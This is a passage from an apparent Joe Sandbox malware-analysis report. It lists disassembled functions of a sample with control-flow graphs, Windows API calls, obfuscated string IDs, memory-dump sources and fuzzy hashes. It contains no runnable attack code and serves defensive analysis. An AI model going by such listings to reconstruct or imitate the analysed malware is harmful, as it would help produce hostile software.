                                                                              control_flow_graph 467 338f20-338f31 call 36ced0 470 338f37-338f4f call 366070 467->470 471 339146-33914f ExitProcess 467->471 475 339141 call 36e3b0 470->475 476 338f55-338f7b 470->476 475->471 480 338f81-339034 476->480 481 338f7d-338f7f 476->481 483 33903a-3390aa 480->483 484 3390d9-339135 call 33a2f0 480->484 481->480 485 3390b0-3390d7 483->485 486 3390ac-3390ae 483->486 484->475 489 339137 call 33ce90 484->489 485->484 486->485 491 33913c call 33bd80 489->491 491->475
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(00000000), ref: 00339149
                                                                                • Part of subcall function 0033BD80: FreeLibrary.KERNEL32(00339141), ref: 0033BD86
                                                                                • Part of subcall function 0033BD80: FreeLibrary.KERNEL32 ref: 0033BDA7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 1614911148-0
                                                                              • Opcode ID: 5fc0ea29a1fab4a30edf88de932a1b13e4ed9a172ae28c75c43ae8e81f8428fe
                                                                              • Instruction ID: 5cacd571ca7c58d4dac2cae55682c8f9ec5004eddfb45ef8e237136542e9c9d8
                                                                              • Opcode Fuzzy Hash: 5fc0ea29a1fab4a30edf88de932a1b13e4ed9a172ae28c75c43ae8e81f8428fe
                                                                              • Instruction Fuzzy Hash: F85199B7B843054BD318AAA68CC23ABF9978BC4314F0FA43D5980DB381EEB99C0541D0
                                                                              Function 00357E50 Relevance: 1.7, Strings: 1, Instructions: 411COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 493 357e50-357e78 494 357e80-357e9f 493->494 494->494 495 357ea1-357ead 494->495 496 357ef4-357f05 495->496 497 357eaf-357eb7 495->497 499 357f10-357f39 496->499 498 357ec0-357ec7 497->498 500 357ed0-357ed6 498->500 501 357ec9-357ecc 498->501 499->499 502 357f3b-357f3f 499->502 500->496 506 357ed8-357eec call 36e470 500->506 501->498 505 357ece 501->505 503 357f41-357f6f call 36ba10 502->503 504 357fc0-357fc2 502->504 512 357f70-357f8f 503->512 508 3582bf-3582c8 504->508 505->496 511 357ef1 506->511 511->496 512->512 513 357f91-357f9d 512->513 514 357fe6-357fea 513->514 515 357f9f-357fa7 513->515 517 3582b6-3582bc call 36bab0 514->517 518 357ff0-357ff9 514->518 516 357fb0-357fb7 515->516 521 357fc7-357fcd 516->521 522 357fb9-357fbc 516->522 517->508 519 358000-358015 518->519 519->519 523 358017-358019 519->523 521->514 526 357fcf-357fde call 36e470 521->526 522->516 525 357fbe 522->525 527 358020-35802e call 3386e0 523->527 528 35801b 523->528 525->514 531 357fe3 526->531 533 358040-35804a 527->533 528->527 531->514 534 358030-35803e 533->534 535 35804c-35804f 533->535 534->533 536 358063-35806a 534->536 537 358050-35805f 535->537 539 358070-35807b 536->539 540 3582ad-3582b3 call 3386f0 536->540 537->537 538 358061 537->538 538->534 542 35807d-358087 539->542 543 3580cb-3580e4 call 3386e0 539->543 540->517 546 3580a6-3580aa 542->546 552 358224-35824f 543->552 553 3580ea-3580f0 543->553 547 358090-358098 546->547 548 3580ac-3580b5 546->548 554 35809b-3580a4 547->554 550 3580b7-3580ba 548->550 551 3580c0-3580c4 548->551 550->554 551->554 555 3580c6-3580c9 551->555 557 358250-358285 552->557 553->552 556 3580f6-3580ff 553->556 554->543 554->546 555->554 558 358100-35810a 556->558 557->557 559 358287-3582aa call 3395f0 call 3386f0 557->559 560 358120-358125 558->560 561 35810c-358111 558->561 559->540 564 358127-35812a 560->564 565 358150-358162 560->565 563 3581c0-3581c6 561->563 570 3581c8-3581ce 563->570 564->565 571 35812c-35814b 564->571 567 358164-358167 565->567 568 3581da-3581e3 565->568 567->568 572 358169-3581ba 567->572 575 3581e5-3581eb 568->575 576 3581ed-3581f0 568->576 570->552 574 3581d0-3581d2 570->574 571->563 572->563 574->558 577 3581d8 574->577 575->570 578 3581f2-35821a 576->578 579 35821c-358222 576->579 577->552 578->563 579->563
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: KJML
                                                                              • API String ID: 2994545307-719402181
                                                                              • Opcode ID: 4613f91795aaf5dbf4fd8fe6ac8b54a8000bce4106cef5a08aef20294165e5d4
                                                                              • Instruction ID: 06d246b73e97a188bf93669c2699e25270b2d886147eee3ee8fe294c4cf55751
                                                                              • Opcode Fuzzy Hash: 4613f91795aaf5dbf4fd8fe6ac8b54a8000bce4106cef5a08aef20294165e5d4
                                                                              • Instruction Fuzzy Hash: B2C16D71A087018BD725CF24DC81B7BB796EB95311F1A852CEC869B3A1EA35DC0EC791
                                                                              Function 0036E470 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 586 36e470-36e4a2 LdrInitializeThunk
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0034173D), ref: 0036E49E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                              Function 00350CD0 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 3q4
                                                                              • API String ID: 0-3801341962
                                                                              • Opcode ID: f44a3df0b564d6840f1e484b5b5e461852a2e794dc09cf3862eb9b8aae9869c5
                                                                              • Instruction ID: bd12a9551e7053e626ea5e7be6a2e295320d898d79c0d39e2f9f6c903e327bbd
                                                                              • Opcode Fuzzy Hash: f44a3df0b564d6840f1e484b5b5e461852a2e794dc09cf3862eb9b8aae9869c5
                                                                              • Instruction Fuzzy Hash: 4D412470608341AFE312DF64DC96A5B7BE8EB89315F04883CF688CA251DB34D5498B93
                                                                              Function 0033CA6A Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tw
                                                                              • API String ID: 0-3303754386
                                                                              • Opcode ID: 534721f5ee8e614046e152136bd376070cfe8581f56e7668fd6a2baac1f14f0c
                                                                              • Instruction ID: 85608c3de3cbb8a51359c9d3180f5b8d842c98b4b71af04ebceb8467df3e8f7b
                                                                              • Opcode Fuzzy Hash: 534721f5ee8e614046e152136bd376070cfe8581f56e7668fd6a2baac1f14f0c
                                                                              • Instruction Fuzzy Hash: B021337661D3408FD724CF24C8E136BFBF6EBD5304F25982CE69253281CAB5D9008B06
                                                                              Function 0036BB70 Relevance: .2, Instructions: 223COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 36b025b891b2ecedcfcdda3e021beae27d7882bd7bf1659d50fb1967960f0f33
                                                                              • Instruction ID: 005d5952adc8153fe01232b4c52ec64848a9dd0acb37ca7c22c96ffe20b9b278
                                                                              • Opcode Fuzzy Hash: 36b025b891b2ecedcfcdda3e021beae27d7882bd7bf1659d50fb1967960f0f33
                                                                              • Instruction Fuzzy Hash: 055146352083048FD725AF24D855B2BFBE5EB81300F15C83CD585CB3AAEB359C958B81
                                                                              Function 0036E3D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 403 36e3d0-36e3e5 404 36e456-36e45f call 36bab0 403->404 405 36e3ec-36e3f3 403->405 406 36e3fa-36e40b 403->406 407 36e44b-36e454 call 36ba10 403->407 415 36e461 404->415 405->404 405->406 409 36e410-36e434 406->409 414 36e464-36e467 407->414 409->409 413 36e436-36e449 RtlReAllocateHeap 409->413 413->415 415->414
                                                                              APIs
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0036E443
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID: ,X_P$1X_P
                                                                              • API String ID: 1279760036-2502780324
                                                                              • Opcode ID: 3d7175c035ac896ba67a3b77ab903c079d0076ecf8f0fe797197733acb743def
                                                                              • Instruction ID: 430881e617b6dbb0f6fb52f2c4be5fecafab877b48dfee0f1eea44ed1724cb02
                                                                              • Opcode Fuzzy Hash: 3d7175c035ac896ba67a3b77ab903c079d0076ecf8f0fe797197733acb743def
                                                                              • Instruction Fuzzy Hash: C60168B47042019BD3165B35FC9172BBFDA9FC5310F18C538E68147609E635985AC792
                                                                              Function 0036BAB0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 580 36bab0-36bac1 581 36bb61-36bb68 580->581 582 36bac8-36badb 580->582 583 36bae0-36bb4a 582->583 583->583 584 36bb4c-36bb5b RtlFreeHeap 583->584 584->581
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0036BB5B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: 67fec34487c23aa77cbef9e5c6ab33087cc732f9e22efb9178b4286aa8b2d11d
                                                                              • Instruction ID: 2452df3167965c77cf5c2cb3011481f8945ecffd9e85eda93f3eb4e7488fcea2
                                                                              • Opcode Fuzzy Hash: 67fec34487c23aa77cbef9e5c6ab33087cc732f9e22efb9178b4286aa8b2d11d
                                                                              • Instruction Fuzzy Hash: 5F11EF722593099BC728AE99DCC67A3B7F6DF80308F14013ED6C24A351E178491ED740
                                                                              Function 0033CEC3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 585 33cec3-33cef2 CoInitializeSecurity
                                                                              APIs
                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0033CED6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeSecurity
                                                                              • String ID:
                                                                              • API String ID: 640775948-0
                                                                              • Opcode ID: a2a54e8cf20504fe7fb23c5ec63e29efa2495fdd308cf17b6a55e4b09fb41cce
                                                                              • Instruction ID: cf21d8013e4e2c8e84ec22b709989101f4b6836012012a6e372384787082b2e2
                                                                              • Opcode Fuzzy Hash: a2a54e8cf20504fe7fb23c5ec63e29efa2495fdd308cf17b6a55e4b09fb41cce
                                                                              • Instruction Fuzzy Hash: FDD012353E4701BAF13D86189C63F652209A702F90F341A08B326FE2D1CAD07111550C

                                                                              Non-executed Functions

                                                                              Function 004F5634 Relevance: 10.4, Strings: 7, Instructions: 1615COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: TZp@$vB_}$Gm}$O{k$[?X$_~$;x
                                                                              • API String ID: 0-4174716500
                                                                              • Opcode ID: d486a56644727ed7f570309f5c046ef49cf116518be67f88c9c77d2fd709259b
                                                                              • Instruction ID: 1756d2643a78231b066f3db9271d9f3c128713ee124a807a13f64855b666c2c4
                                                                              • Opcode Fuzzy Hash: d486a56644727ed7f570309f5c046ef49cf116518be67f88c9c77d2fd709259b
                                                                              • Instruction Fuzzy Hash: 0AB2E6F360C2049FE7046E2DEC8577ABBE9EF94720F1A493DE6C5C3744EA3598018696
                                                                              Function 0034FC80 Relevance: 8.5, Strings: 6, Instructions: 961COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
